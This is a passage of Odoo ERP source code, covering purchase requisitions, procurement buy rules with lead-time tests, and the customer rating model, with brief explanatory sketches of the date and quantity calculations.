if fpos:
taxes_ids = fpos.map_tax(line.product_id.supplier_taxes_id.filtered(lambda tax: tax.company_id == requisition.company_id)).ids
else:
taxes_ids = line.product_id.supplier_taxes_id.filtered(lambda tax: tax.company_id == requisition.company_id).ids
# Compute quantity and price_unit
if line.product_uom_id != line.product_id.uom_po_id:
product_qty = line.product_uom_id._compute_quantity(line.product_qty, line.product_id.uom_po_id)
price_unit = line.product_uom_id._compute_price(line.price_unit, line.product_id.uom_po_id)
else:
product_qty = line.product_qty
price_unit = line.price_unit
if requisition.type_id.quantity_copy != 'copy':
product_qty = 0
# Create PO line
order_line_values = line._prepare_purchase_order_line(
name=name, product_qty=product_qty, price_unit=price_unit,
taxes_ids=taxes_ids)
order_lines.append((0, 0, order_line_values))
self.order_line = order_lines
@api.multi
def button_approve(self, force=False):
res = super(PurchaseOrder, self).button_approve(force=force)
for po in self:
if not po.requisition_id:
continue
if po.requisition_id.type_id.exclusive == 'exclusive':
others_po = po.requisition_id.mapped('purchase_ids').filtered(lambda r: r.id != po.id)
others_po.button_cancel()
po.requisition_id.action_done()
return res
@api.model
def create(self, vals):
purchase = super(PurchaseOrder, self).create(vals)
if purchase.requisition_id:
purchase.message_post_with_view('mail.message_origin_link',
values={'self': purchase, 'origin': purchase.requisition_id},
subtype_id=self.env['ir.model.data'].xmlid_to_res_id('mail.mt_note'))
return purchase
@api.multi
def write(self, vals):
result = super(PurchaseOrder, self).write(vals)
if vals.get('requisition_id'):
self.message_post_with_view('mail.message_origin_link',
values={'self': self, 'origin': self.requisition_id, 'edit': True},
subtype_id=self.env['ir.model.data'].xmlid_to_res_id('mail.mt_note'))
return result
class PurchaseOrderLine(models.Model):
_inherit = "purchase.order.line"
@api.onchange('product_qty', 'product_uom')
def _onchange_quantity(self):
res = super(PurchaseOrderLine, self)._onchange_quantity()
if self.order_id.requisition_id:
for line in self.order_id.requisition_id.line_ids.filtered(lambda l: l.product_id == self.product_id):
if line.product_uom_id != self.product_uom:
self.price_unit = line.product_uom_id._compute_price(
line.price_unit, self.product_uom)
else:
self.price_unit = line.price_unit
break
return res
class ProductProduct(models.Model):
_inherit = 'product.product'
def _prepare_sellers(self, params):
sellers = super(ProductProduct, self)._prepare_sellers(params)
if params and params.get('order_id'):
return sellers.filtered(lambda s: not s.purchase_requisition_id or s.purchase_requisition_id == params['order_id'].requisition_id)
else:
return sellers
class ProductTemplate(models.Model):
_inherit = 'product.template'
purchase_requisition = fields.Selection(
[('rfq', 'Create a draft purchase order'),
('tenders', 'Propose a call for tenders')],
string='Procurement', default='rfq',
help="Create a draft purchase order: Based on your product configuration, the system will create a draft "
"purchase order.Propose a call for tender : If the 'purchase_requisition' module is installed and this option "
"is selected, the system will create a draft call for tender.")
class StockMove(models.Model):
_inherit = "stock.move"
requistion_line_ids = fields.One2many('purchase.requisition.line', 'move_dest_id')
class ProcurementGroup(models.Model):
_inherit = 'procurement.group'
@api.model
def _get_exceptions_domain(self):
return super(ProcurementGroup, self)._get_exceptions_domain() + [('requistion_line_ids', '=', False)]
class StockRule(models.Model):
_inherit = 'stock.rule'
@api.multi
def _run_buy(self, product_id, product_qty, product_uom, location_id, name, origin, values):
if product_id.purchase_requisition != 'tenders':
return super(StockRule, self)._run_buy(product_id, product_qty, product_uom, location_id, name, origin, values)
values = self.env['purchase.requisition']._prepare_tender_values(product_id, product_qty, product_uom, location_id, name, origin, values)
values['picking_type_id'] = self.picking_type_id.id
self.env['purchase.requisition'].create(values)
return True
def _prepare_purchase_order(self, product_id, product_qty, product_uom, origin, values, partner):
res = super(StockRule, self)._prepare_purchase_order(product_id, product_qty, product_uom, origin, values, partner)
res['partner_ref'] = values['supplier'].purchase_requisition_id.name
res['requisition_id'] = values['supplier'].purchase_requisition_id.id
if values['supplier'].purchase_requisition_id.currency_id:
res['currency_id'] = values['supplier'].purchase_requisition_id.currency_id.id
return res
def _make_po_get_domain(self, values, partner):
domain = super(StockRule, self)._make_po_get_domain(values, partner)
if 'supplier' in values and values['supplier'].purchase_requisition_id:
domain += (
('requisition_id', '=', values['supplier'].purchase_requisition_id.id),
)
return domain
class StockMove(models.Model):
_inherit = 'stock.move'
requisition_line_ids = fields.One2many('purchase.requisition.line', 'move_dest_id')
def _get_upstream_documents_and_responsibles(self, visited):
if self.requisition_line_ids:
return [(requisition_line.requisition_id, requisition_line.requisition_id.user_id, visited) for requisition_line in self.requisition_line_ids if requisition_line.requisition_id.state not in ('done', 'cancel')]
else:
return super(StockMove, self)._get_upstream_documents_and_responsibles(visited)
class Orderpoint(models.Model):
_inherit = "stock.warehouse.orderpoint"
def _quantity_in_progress(self):
res = super(Orderpoint, self)._quantity_in_progress()
for op in self:
for pr in self.env['purchase.requisition'].search([('state','=','draft'),('origin','=',op.name)]):
for prline in pr.line_ids.filtered(lambda l: l.product_id.id == op.product_id.id):
res[op.id] += prline.product_uom_id._compute_quantity(prline.product_qty, op.product_uom, round=False)
return res
```
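For reference, `_compute_ordered_qty` above sums, per agreement line, the quantities of matching products on confirmed purchase orders, converting units of measure when the purchase line uses a different one. A rough sketch of that aggregation on plain dicts; the `convert` callback stands in for `uom._compute_quantity`, and all names and values are hypothetical:
```python
def ordered_qty(requisition_line, purchase_orders, convert):
    """convert(qty, from_uom, to_uom) stands in for uom._compute_quantity."""
    total = 0.0
    for po in purchase_orders:
        if po['state'] not in ('purchase', 'done'):   # only confirmed/locked orders count
            continue
        for line in po['lines']:
            if line['product'] != requisition_line['product']:
                continue
            qty = line['qty']
            if line['uom'] != requisition_line['uom']:
                qty = convert(qty, line['uom'], requisition_line['uom'])
            total += qty
    return total

convert = lambda qty, src, dst: qty * 12 if (src, dst) == ('Dozen', 'Unit') else qty
pos = [
    {'state': 'purchase', 'lines': [{'product': 'chair', 'qty': 2, 'uom': 'Dozen'}]},
    {'state': 'draft', 'lines': [{'product': 'chair', 'qty': 5, 'uom': 'Unit'}]},  # ignored: not confirmed
]
print(ordered_qty({'product': 'chair', 'uom': 'Unit'}, pos, convert))  # 24.0
```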
#### File: purchase_stock/models/stock_rule.py
```python
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, _
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT
from odoo.exceptions import UserError
class StockRule(models.Model):
_inherit = 'stock.rule'
action = fields.Selection(selection_add=[('buy', 'Buy')])
def _get_message_dict(self):
message_dict = super(StockRule, self)._get_message_dict()
dummy, destination, dummy = self._get_message_values()
message_dict.update({
'buy': _('When products are needed in <b>%s</b>, <br/> a request for quotation is created to fulfill the need.') % (destination)
})
return message_dict
@api.onchange('action')
def _onchange_action(self):
domain = {'picking_type_id': []}
if self.action == 'buy':
self.location_src_id = False
domain = {'picking_type_id': [('code', '=', 'incoming')]}
return {'domain': domain}
@api.multi
def _run_buy(self, product_id, product_qty, product_uom, location_id, name, origin, values):
cache = {}
suppliers = product_id.seller_ids\
.filtered(lambda r: (not r.company_id or r.company_id == values['company_id']) and (not r.product_id or r.product_id == product_id) and r.name.active)
if not suppliers:
msg = _('There is no vendor associated to the product %s. Please define a vendor for this product.') % (product_id.display_name,)
raise UserError(msg)
supplier = self._make_po_select_supplier(values, suppliers)
partner = supplier.name
# we put `supplier_info` in values for extensibility purposes
values['supplier'] = supplier
domain = self._make_po_get_domain(values, partner)
if domain in cache:
po = cache[domain]
else:
po = self.env['purchase.order'].sudo().search([dom for dom in domain])
po = po[0] if po else False
cache[domain] = po
if not po:
vals = self._prepare_purchase_order(product_id, product_qty, product_uom, origin, values, partner)
company_id = values.get('company_id') and values['company_id'].id or self.env.user.company_id.id
po = self.env['purchase.order'].with_context(force_company=company_id).sudo().create(vals)
cache[domain] = po
elif not po.origin or origin not in po.origin.split(', '):
if po.origin:
if origin:
po.write({'origin': po.origin + ', ' + origin})
else:
po.write({'origin': po.origin})
else:
po.write({'origin': origin})
# Create Line
po_line = False
for line in po.order_line:
if line.product_id == product_id and line.product_uom == product_id.uom_po_id:
if line._merge_in_existing_line(product_id, product_qty, product_uom, location_id, name, origin, values):
vals = self._update_purchase_order_line(product_id, product_qty, product_uom, values, line, partner)
po_line = line.write(vals)
break
if not po_line:
vals = self._prepare_purchase_order_line(product_id, product_qty, product_uom, values, po, partner)
self.env['purchase.order.line'].sudo().create(vals)
def _get_purchase_schedule_date(self, values):
"""Return the datetime value to use as Schedule Date (``date_planned``) for the
Purchase Order Lines created to satisfy the given procurement. """
procurement_date_planned = fields.Datetime.from_string(values['date_planned'])
schedule_date = (procurement_date_planned - relativedelta(days=values['company_id'].po_lead))
return schedule_date
def _get_purchase_order_date(self, product_id, product_qty, product_uom, values, partner, schedule_date):
"""Return the datetime value to use as Order Date (``date_order``) for the
Purchase Order created to satisfy the given procurement. """
seller = product_id.with_context(force_company=values['company_id'].id)._select_seller(
partner_id=partner,
quantity=product_qty,
date=schedule_date and schedule_date.date(),
uom_id=product_uom)
return schedule_date - relativedelta(days=int(seller.delay))
def _update_purchase_order_line(self, product_id, product_qty, product_uom, values, line, partner):
procurement_uom_po_qty = product_uom._compute_quantity(product_qty, product_id.uom_po_id)
seller = product_id.with_context(force_company=values['company_id'].id)._select_seller(
partner_id=partner,
quantity=line.product_qty + procurement_uom_po_qty,
date=line.order_id.date_order and line.order_id.date_order.date(),
uom_id=product_id.uom_po_id)
price_unit = self.env['account.tax']._fix_tax_included_price_company(seller.price, line.product_id.supplier_taxes_id, line.taxes_id, values['company_id']) if seller else 0.0
if price_unit and seller and line.order_id.currency_id and seller.currency_id != line.order_id.currency_id:
price_unit = seller.currency_id._convert(
price_unit, line.order_id.currency_id, line.order_id.company_id, fields.Date.today())
res = {
'product_qty': line.product_qty + procurement_uom_po_qty,
'price_unit': price_unit,
'move_dest_ids': [(4, x.id) for x in values.get('move_dest_ids', [])]
}
orderpoint_id = values.get('orderpoint_id')
if orderpoint_id:
res['orderpoint_id'] = orderpoint_id.id
return res
@api.multi
def _prepare_purchase_order_line(self, product_id, product_qty, product_uom, values, po, partner):
procurement_uom_po_qty = product_uom._compute_quantity(product_qty, product_id.uom_po_id)
seller = product_id.with_context(force_company=values['company_id'].id)._select_seller(
partner_id=partner,
quantity=procurement_uom_po_qty,
date=po.date_order and po.date_order.date(),
uom_id=product_id.uom_po_id)
taxes = product_id.supplier_taxes_id
fpos = po.fiscal_position_id
taxes_id = fpos.map_tax(taxes, product_id, seller.name) if fpos else taxes
if taxes_id:
taxes_id = taxes_id.filtered(lambda x: x.company_id.id == values['company_id'].id)
price_unit = self.env['account.tax']._fix_tax_included_price_company(seller.price, product_id.supplier_taxes_id, taxes_id, values['company_id']) if seller else 0.0
if price_unit and seller and po.currency_id and seller.currency_id != po.currency_id:
price_unit = seller.currency_id._convert(
price_unit, po.currency_id, po.company_id, po.date_order or fields.Date.today())
product_lang = product_id.with_context({
'lang': partner.lang,
'partner_id': partner.id,
})
name = product_lang.display_name
if product_lang.description_purchase:
name += '\n' + product_lang.description_purchase
date_planned = self.env['purchase.order.line']._get_date_planned(seller, po=po).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return {
'name': name,
'product_qty': procurement_uom_po_qty,
'product_id': product_id.id,
'product_uom': product_id.uom_po_id.id,
'price_unit': price_unit,
'date_planned': date_planned,
'orderpoint_id': values.get('orderpoint_id', False) and values.get('orderpoint_id').id,
'taxes_id': [(6, 0, taxes_id.ids)],
'order_id': po.id,
'move_dest_ids': [(4, x.id) for x in values.get('move_dest_ids', [])],
}
def _prepare_purchase_order(self, product_id, product_qty, product_uom, origin, values, partner):
schedule_date = self._get_purchase_schedule_date(values)
purchase_date = self._get_purchase_order_date(product_id, product_qty, product_uom, values, partner, schedule_date)
fpos = self.env['account.fiscal.position'].with_context(force_company=values['company_id'].id).get_fiscal_position(partner.id)
gpo = self.group_propagation_option
group = (gpo == 'fixed' and self.group_id.id) or \
(gpo == 'propagate' and values.get('group_id') and values['group_id'].id) or False
return {
'partner_id': partner.id,
'picking_type_id': self.picking_type_id.id,
'company_id': values['company_id'].id,
'currency_id': partner.with_context(force_company=values['company_id'].id).property_purchase_currency_id.id or values['company_id'].currency_id.id,
'dest_address_id': values.get('partner_id', False),
'origin': origin,
'payment_term_id': partner.with_context(force_company=values['company_id'].id).property_supplier_payment_term_id.id,
'date_order': purchase_date.strftime(DEFAULT_SERVER_DATETIME_FORMAT),
'fiscal_position_id': fpos,
'group_id': group
}
def _make_po_select_supplier(self, values, suppliers):
""" Method intended to be overridden by customized modules to implement any logic in the
selection of supplier.
"""
return suppliers[0]
def _make_po_get_domain(self, values, partner):
domain = super(StockRule, self)._make_po_get_domain(values, partner)
gpo = self.group_propagation_option
group = (gpo == 'fixed' and self.group_id) or \
(gpo == 'propagate' and 'group_id' in values and values['group_id']) or False
domain += (
('partner_id', '=', partner.id),
('state', '=', 'draft'),
('picking_type_id', '=', self.picking_type_id.id),
('company_id', '=', values['company_id'].id),
)
if group:
domain += (('group_id', '=', group.id),)
return domain
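        # In practice this domain means a procurement is merged into an existing
        # draft RFQ only when the vendor, picking type, company and (if the rule
        # propagates it) procurement group all match; otherwise _run_buy falls
        # back to creating a fresh purchase order via _prepare_purchase_order.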
def _push_prepare_move_copy_values(self, move_to_copy, new_date):
res = super(StockRule, self)._push_prepare_move_copy_values(move_to_copy, new_date)
res['purchase_line_id'] = None
return res
```
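The two date helpers in the rule above (`_get_purchase_schedule_date` and `_get_purchase_order_date`) reduce to simple day offsets: receive the goods `po_lead` days before the procurement needs them, and place the order `seller.delay` days before that. A standalone sketch of the arithmetic, with made-up lead-time values:
```python
from datetime import datetime, timedelta

def purchase_schedule_date(date_planned, po_lead_days):
    # _get_purchase_schedule_date: plan the receipt po_lead days early
    return date_planned - timedelta(days=po_lead_days)

def purchase_order_date(schedule_date, seller_delay_days):
    # _get_purchase_order_date: order early enough to cover the vendor lead time
    return schedule_date - timedelta(days=seller_delay_days)

need_by = datetime(2019, 6, 20, 12, 0)
schedule = purchase_schedule_date(need_by, po_lead_days=3)     # 2019-06-17 12:00
order = purchase_order_date(schedule, seller_delay_days=5)     # 2019-06-12 12:00
print(schedule, order)
```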
#### File: purchase_stock/tests/test_purchase_lead_time.py
```python
from datetime import timedelta
from odoo import fields
from .common import TestPurchase
class TestPurchaseLeadTime(TestPurchase):
def test_00_product_company_level_delays(self):
""" To check dates, set product's Delivery Lead Time
and company's Purchase Lead Time."""
company = self.env.ref('base.main_company')
# Update company with Purchase Lead Time
company.write({'po_lead': 3.00})
        # Make procurement request from product_1's form view, create procurement and check its state
date_planned = fields.Datetime.to_string(fields.datetime.now() + timedelta(days=10))
self._create_make_procurement(self.product_1, 15.00, date_planned=date_planned)
purchase = self.env['purchase.order.line'].search([('product_id', '=', self.product_1.id)], limit=1).order_id
# Confirm purchase order
purchase.button_confirm()
# Check order date of purchase order
order_date = fields.Datetime.from_string(date_planned) - timedelta(days=company.po_lead) - timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(purchase.date_order, order_date, 'Order date should be equal to: Date of the procurement order - Purchase Lead Time - Delivery Lead Time.')
# Check scheduled date of purchase order
schedule_date = order_date + timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(purchase.date_planned, schedule_date, 'Schedule date should be equal to: Order date of Purchase order + Delivery Lead Time.')
# check the picking created or not
self.assertTrue(purchase.picking_ids, "Picking should be created.")
# Check scheduled date of In Type shipment
self.assertEqual(purchase.picking_ids.scheduled_date, schedule_date, 'Schedule date of In type shipment should be equal to: schedule date of purchase order.')
def test_01_product_level_delay(self):
""" To check schedule dates of multiple purchase order line of the same purchase order,
we create two procurements for the two different product with same vendor
and different Delivery Lead Time."""
        # Make procurement request from product_1's form view, create procurement and check its state
date_planned1 = fields.Datetime.to_string(fields.datetime.now() + timedelta(days=10))
self._create_make_procurement(self.product_1, 10.00, date_planned=date_planned1)
purchase1 = self.env['purchase.order.line'].search([('product_id', '=', self.product_1.id)], limit=1).order_id
        # Make procurement request from product_2's form view, create procurement and check its state
date_planned2 = fields.Datetime.to_string(fields.datetime.now() + timedelta(days=10))
self._create_make_procurement(self.product_2, 5.00, date_planned=date_planned2)
purchase2 = self.env['purchase.order.line'].search([('product_id', '=', self.product_2.id)], limit=1).order_id
# Check purchase order is same or not
self.assertEqual(purchase1, purchase2, 'Purchase orders should be same for the two different product with same vendor.')
# Confirm purchase order
purchase1.button_confirm()
# Check order date of purchase order
order_line_pro_1 = purchase2.order_line.filtered(lambda r: r.product_id == self.product_1)
order_line_pro_2 = purchase2.order_line.filtered(lambda r: r.product_id == self.product_2)
order_date = fields.Datetime.from_string(date_planned1) - timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(purchase2.date_order, order_date, 'Order date should be equal to: Date of the procurement order - Delivery Lead Time.')
# Check scheduled date of purchase order line for product_1
schedule_date_1 = order_date + timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(order_line_pro_1.date_planned, schedule_date_1, 'Schedule date of purchase order line for product_1 should be equal to: Order date of purchase order + Delivery Lead Time of product_1.')
# Check scheduled date of purchase order line for product_2
schedule_date_2 = order_date + timedelta(days=self.product_2.seller_ids.delay)
self.assertEqual(order_line_pro_2.date_planned, schedule_date_2, 'Schedule date of purchase order line for product_2 should be equal to: Order date of purchase order + Delivery Lead Time of product_2.')
# Check scheduled date of purchase order
po_schedule_date = min(schedule_date_1, schedule_date_2)
self.assertEqual(purchase2.date_planned, po_schedule_date, 'Schedule date of purchase order should be minimum of schedule dates of purchase order lines.')
# Check the picking created or not
self.assertTrue(purchase2.picking_ids, "Picking should be created.")
# Check scheduled date of In Type shipment
self.assertEqual(purchase2.picking_ids.scheduled_date, po_schedule_date, 'Schedule date of In type shipment should be same as schedule date of purchase order.')
def test_02_product_route_level_delays(self):
""" In order to check dates, set product's Delivery Lead Time
and warehouse route's delay."""
# Update warehouse_1 with Incoming Shipments 3 steps
self.warehouse_1.write({'reception_steps': 'three_steps'})
# Set delay on push rule
for push_rule in self.warehouse_1.reception_route_id.rule_ids:
push_rule.write({'delay': 2})
rule_delay = sum(self.warehouse_1.reception_route_id.rule_ids.mapped('delay'))
date_planned = fields.Datetime.to_string(fields.datetime.now() + timedelta(days=10))
# Create procurement order of product_1
self.env['procurement.group'].run(self.product_1, 5.000, self.uom_unit, self.warehouse_1.lot_stock_id, 'Test scheduler for RFQ', '/', {
'warehouse_id': self.warehouse_1,
'date_planned': date_planned, # 10 days added to current date of procurement to get future schedule date and order date of purchase order.
'rule_id': self.warehouse_1.buy_pull_id,
'group_id': False,
'route_ids': [],
})
# Confirm purchase order
purchase = self.env['purchase.order.line'].search([('product_id', '=', self.product_1.id)], limit=1).order_id
purchase.button_confirm()
# Check order date of purchase order
order_date = fields.Datetime.from_string(date_planned) - timedelta(days=self.product_1.seller_ids.delay + rule_delay)
self.assertEqual(purchase.date_order, order_date, 'Order date should be equal to: Date of the procurement order - Delivery Lead Time(supplier and pull rules).')
# Check scheduled date of purchase order
schedule_date = order_date + timedelta(days=self.product_1.seller_ids.delay + rule_delay)
self.assertEqual(date_planned, str(schedule_date), 'Schedule date should be equal to: Order date of Purchase order + Delivery Lead Time(supplier and pull rules).')
        # Check the picking created or not
self.assertTrue(purchase.picking_ids, "Picking should be created.")
# Check scheduled date of Internal Type shipment
incoming_shipment1 = self.env['stock.picking'].search([('move_lines.product_id', 'in', (self.product_1.id, self.product_2.id)), ('picking_type_id', '=', self.warehouse_1.int_type_id.id), ('location_id', '=', self.warehouse_1.wh_input_stock_loc_id.id), ('location_dest_id', '=', self.warehouse_1.wh_qc_stock_loc_id.id)])
incoming_shipment1_date = order_date + timedelta(days=self.product_1.seller_ids.delay)
self.assertEqual(incoming_shipment1.scheduled_date, incoming_shipment1_date, 'Schedule date of Internal Type shipment for input stock location should be equal to: schedule date of purchase order + push rule delay.')
incoming_shipment2 = self.env['stock.picking'].search([('picking_type_id', '=', self.warehouse_1.int_type_id.id), ('location_id', '=', self.warehouse_1.wh_qc_stock_loc_id.id), ('location_dest_id', '=', self.warehouse_1.lot_stock_id.id)])
incoming_shipment2_date = schedule_date - timedelta(days=incoming_shipment2.move_lines[0].rule_id.delay)
        self.assertEqual(incoming_shipment2.scheduled_date, incoming_shipment2_date, 'Schedule date of Internal Type shipment for quality control stock location should be equal to: schedule date of Internal type shipment for input stock location + push rule delay.')
```
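The assertions in `test_02_product_route_level_delays` chain three delays: the vendor lead time plus one push-rule delay per internal reception step. As plain date arithmetic (the 1-day vendor delay is an assumption for the example; the test reads it from the product's seller record):
```python
from datetime import datetime, timedelta

date_planned = datetime(2019, 6, 30)
seller_delay = 1          # hypothetical vendor lead time (product_1.seller_ids.delay in the test)
push_delays = [2, 2]      # input -> quality control, quality control -> stock

order_date = date_planned - timedelta(days=seller_delay + sum(push_delays))
receipt_date = order_date + timedelta(days=seller_delay)     # vendor -> input location
qc_date = receipt_date + timedelta(days=push_delays[0])      # input -> quality control
stock_date = qc_date + timedelta(days=push_delays[1])        # quality control -> stock
assert stock_date == date_planned                            # goods reach stock exactly on time
```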
#### File: rating/models/rating.py
```python
import base64
import uuid
from datetime import timedelta
from odoo import api, fields, models, tools, _
from odoo.modules.module import get_resource_path
RATING_LIMIT_SATISFIED = 7
RATING_LIMIT_OK = 3
RATING_LIMIT_MIN = 1
class Rating(models.Model):
_name = "rating.rating"
_description = "Rating"
_order = 'write_date desc'
_rec_name = 'res_name'
_sql_constraints = [
        ('rating_range', 'check(rating >= 0 and rating <= 10)', 'Rating should be between 0 and 10'),
]
@api.one
@api.depends('res_model', 'res_id')
def _compute_res_name(self):
name = self.env[self.res_model].sudo().browse(self.res_id).name_get()
self.res_name = name and name[0][1] or ('%s/%s') % (self.res_model, self.res_id)
@api.model
def new_access_token(self):
return uuid.uuid4().hex
res_name = fields.Char(string='Resource name', compute='_compute_res_name', store=True, help="The name of the rated resource.")
res_model_id = fields.Many2one('ir.model', 'Related Document Model', index=True, ondelete='cascade', help='Model of the followed resource')
res_model = fields.Char(string='Document Model', related='res_model_id.model', store=True, index=True, readonly=True)
res_id = fields.Integer(string='Document', required=True, help="Identifier of the rated object", index=True)
parent_res_name = fields.Char('Parent Document Name', compute='_compute_parent_res_name', store=True)
parent_res_model_id = fields.Many2one('ir.model', 'Parent Related Document Model', index=True, ondelete='cascade')
parent_res_model = fields.Char('Parent Document Model', store=True, related='parent_res_model_id.model', index=True, readonly=False)
parent_res_id = fields.Integer('Parent Document', index=True)
rated_partner_id = fields.Many2one('res.partner', string="Rated person", help="Owner of the rated resource")
partner_id = fields.Many2one('res.partner', string='Customer', help="Author of the rating")
rating = fields.Float(string="Rating Number", group_operator="avg", default=0, help="Rating value: 0=Unhappy, 10=Happy")
rating_image = fields.Binary('Image', compute='_compute_rating_image')
rating_text = fields.Selection([
('satisfied', 'Satisfied'),
('not_satisfied', 'Not satisfied'),
('highly_dissatisfied', 'Highly dissatisfied'),
('no_rating', 'No Rating yet')], string='Rating', store=True, compute='_compute_rating_text', readonly=True)
feedback = fields.Text('Comment', help="Reason of the rating")
message_id = fields.Many2one('mail.message', string="Linked message", help="Associated message when posting a review. Mainly used in website addons.", index=True)
access_token = fields.Char('Security Token', default=new_access_token, help="Access token to set the rating of the value")
consumed = fields.Boolean(string="Filled Rating", help="Enabled if the rating has been filled.")
@api.depends('parent_res_model', 'parent_res_id')
def _compute_parent_res_name(self):
for rating in self:
name = False
if rating.parent_res_model and rating.parent_res_id:
name = self.env[rating.parent_res_model].sudo().browse(rating.parent_res_id).name_get()
name = name and name[0][1] or ('%s/%s') % (rating.parent_res_model, rating.parent_res_id)
rating.parent_res_name = name
@api.multi
@api.depends('rating')
def _compute_rating_image(self):
for rating in self:
try:
image_path = get_resource_path('rating', 'static/src/img', 'rating_%s.png' % (int(rating.rating),))
rating.rating_image = base64.b64encode(open(image_path, 'rb').read())
except (IOError, OSError):
rating.rating_image = False
@api.depends('rating')
def _compute_rating_text(self):
for rating in self:
if rating.rating >= RATING_LIMIT_SATISFIED:
rating.rating_text = 'satisfied'
elif rating.rating > RATING_LIMIT_OK:
rating.rating_text = 'not_satisfied'
elif rating.rating >= RATING_LIMIT_MIN:
rating.rating_text = 'highly_dissatisfied'
else:
rating.rating_text = 'no_rating'
@api.model
def create(self, values):
if values.get('res_model_id') and values.get('res_id'):
values.update(self._find_parent_data(values))
return super(Rating, self).create(values)
@api.multi
def write(self, values):
if values.get('res_model_id') and values.get('res_id'):
values.update(self._find_parent_data(values))
return super(Rating, self).write(values)
def _find_parent_data(self, values):
""" Determine the parent res_model/res_id, based on the values to create or write """
current_model_name = self.env['ir.model'].sudo().browse(values['res_model_id']).model
current_record = self.env[current_model_name].browse(values['res_id'])
data = {
'parent_res_model_id': False,
'parent_res_id': False,
}
if hasattr(current_record, 'rating_get_parent'):
current_record_parent = current_record.rating_get_parent()
if current_record_parent:
parent_res_model = getattr(current_record, current_record_parent)
data['parent_res_model_id'] = self.env['ir.model']._get(parent_res_model._name).id
data['parent_res_id'] = parent_res_model.id
return data
@api.multi
def reset(self):
for record in self:
record.write({
'rating': 0,
'access_token': record.new_access_token(),
'feedback': False,
'consumed': False,
})
def action_open_rated_object(self):
self.ensure_one()
return {
'type': 'ir.actions.act_window',
'res_model': self.res_model,
'res_id': self.res_id,
'views': [[False, 'form']]
}
class RatingMixin(models.AbstractModel):
_name = 'rating.mixin'
_description = "Rating Mixin"
rating_ids = fields.One2many('rating.rating', 'res_id', string='Rating', domain=lambda self: [('res_model', '=', self._name)], auto_join=True)
rating_last_value = fields.Float('Rating Last Value', compute='_compute_rating_last_value', compute_sudo=True, store=True)
rating_last_feedback = fields.Text('Rating Last Feedback', related='rating_ids.feedback', readonly=False)
rating_last_image = fields.Binary('Rating Last Image', related='rating_ids.rating_image', readonly=False)
rating_count = fields.Integer('Rating count', compute="_compute_rating_count")
@api.multi
@api.depends('rating_ids.rating')
def _compute_rating_last_value(self):
for record in self:
ratings = self.env['rating.rating'].search([('res_model', '=', self._name), ('res_id', '=', record.id)], limit=1)
if ratings:
record.rating_last_value = ratings.rating
@api.multi
@api.depends('rating_ids')
def _compute_rating_count(self):
read_group_res = self.env['rating.rating'].read_group(
[('res_model', '=', self._name), ('res_id', 'in', self.ids), ('consumed', '=', True)],
['res_id'], groupby=['res_id'])
result = dict.fromkeys(self.ids, 0)
for data in read_group_res:
result[data['res_id']] += data['res_id_count']
for record in self:
record.rating_count = result.get(record.id)
def write(self, values):
""" If the rated ressource name is modified, we should update the rating res_name too.
If the rated ressource parent is changed we should update the parent_res_id too"""
with self.env.norecompute():
result = super(RatingMixin, self).write(values)
for record in self:
if record._rec_name in values: # set the res_name of ratings to be recomputed
res_name_field = self.env['rating.rating']._fields['res_name']
record.rating_ids._recompute_todo(res_name_field)
if record.rating_get_parent() in values:
record.rating_ids.write({'parent_res_id': record[record.rating_get_parent()].id})
if self.env.recompute and self._context.get('recompute', True): # trigger the recomputation of all field marked as "to recompute"
self.recompute()
return result
def unlink(self):
""" When removing a record, its rating should be deleted too. """
record_ids = self.ids
result = super(RatingMixin, self).unlink()
self.env['rating.rating'].sudo().search([('res_model', '=', self._name), ('res_id', 'in', record_ids)]).unlink()
return result
def rating_get_parent(self):
"""Return the parent relation field name
        Should return a Many2one field."""
return None
def rating_get_partner_id(self):
if hasattr(self, 'partner_id') and self.partner_id:
return self.partner_id
return self.env['res.partner']
def rating_get_rated_partner_id(self):
if hasattr(self, 'user_id') and self.user_id.partner_id:
return self.user_id.partner_id
return self.env['res.partner']
def rating_get_access_token(self, partner=None):
if not partner:
partner = self.rating_get_partner_id()
rated_partner = self.rating_get_rated_partner_id()
ratings = self.rating_ids.filtered(lambda x: x.partner_id.id == partner.id and not x.consumed)
if not ratings:
record_model_id = self.env['ir.model'].sudo().search([('model', '=', self._name)], limit=1).id
rating = self.env['rating.rating'].create({
'partner_id': partner.id,
'rated_partner_id': rated_partner.id,
'res_model_id': record_model_id,
'res_id': self.id
})
else:
rating = ratings[0]
return rating.access_token
@api.multi
def rating_send_request(self, template, lang=False, subtype_id=False, force_send=True, composition_mode='comment', notif_layout=None):
""" This method send rating request by email, using a template given
in parameter.
:param template: a mail.template record used to compute the message body;
:param lang: optional lang; it can also be specified directly on the template
itself in the lang field;
:param subtype_id: optional subtype to use when creating the message; is
a note by default to avoid spamming followers;
:param force_send: whether to send the request directly or use the mail
queue cron (preferred option);
:param composition_mode: comment (message_post) or mass_mail (template.send_mail);
:param notif_layout: layout used to encapsulate the content when sending email;
"""
if lang:
template = template.with_context(lang=lang)
if subtype_id is False:
subtype_id = self.env['ir.model.data'].xmlid_to_res_id('mail.mt_note')
if force_send:
self = self.with_context(mail_notify_force_send=True)
for record in self:
record.message_post_with_template(
template.id,
composition_mode=composition_mode,
notif_layout=notif_layout if notif_layout is not None else 'mail.mail_notification_light',
subtype_id=subtype_id
)
@api.multi
def rating_apply(self, rate, token=None, feedback=None, subtype=None):
""" Apply a rating given a token. If the current model inherits from
mail.thread mixing, a message is posted on its chatter.
:param rate : the rating value to apply
:type rate : float
:param token : access token
:param feedback : additional feedback
:type feedback : string
:param subtype : subtype for mail
:type subtype : string
:returns rating.rating record
"""
Rating, rating = self.env['rating.rating'], None
if token:
rating = self.env['rating.rating'].search([('access_token', '=', token)], limit=1)
else:
rating = Rating.search([('res_model', '=', self._name), ('res_id', '=', self.ids[0])], limit=1)
if rating:
rating.write({'rating': rate, 'feedback': feedback, 'consumed': True})
if hasattr(self, 'message_post'):
feedback = tools.plaintext2html(feedback or '')
self.message_post(
body="<img src='/rating/static/src/img/rating_%s.png' alt=':%s/10' style='width:18px;height:18px;float:left;margin-right: 5px;'/>%s"
% (rate, rate, feedback),
subtype=subtype or "mail.mt_comment",
author_id=rating.partner_id and rating.partner_id.id or None # None will set the default author in mail_thread.py
)
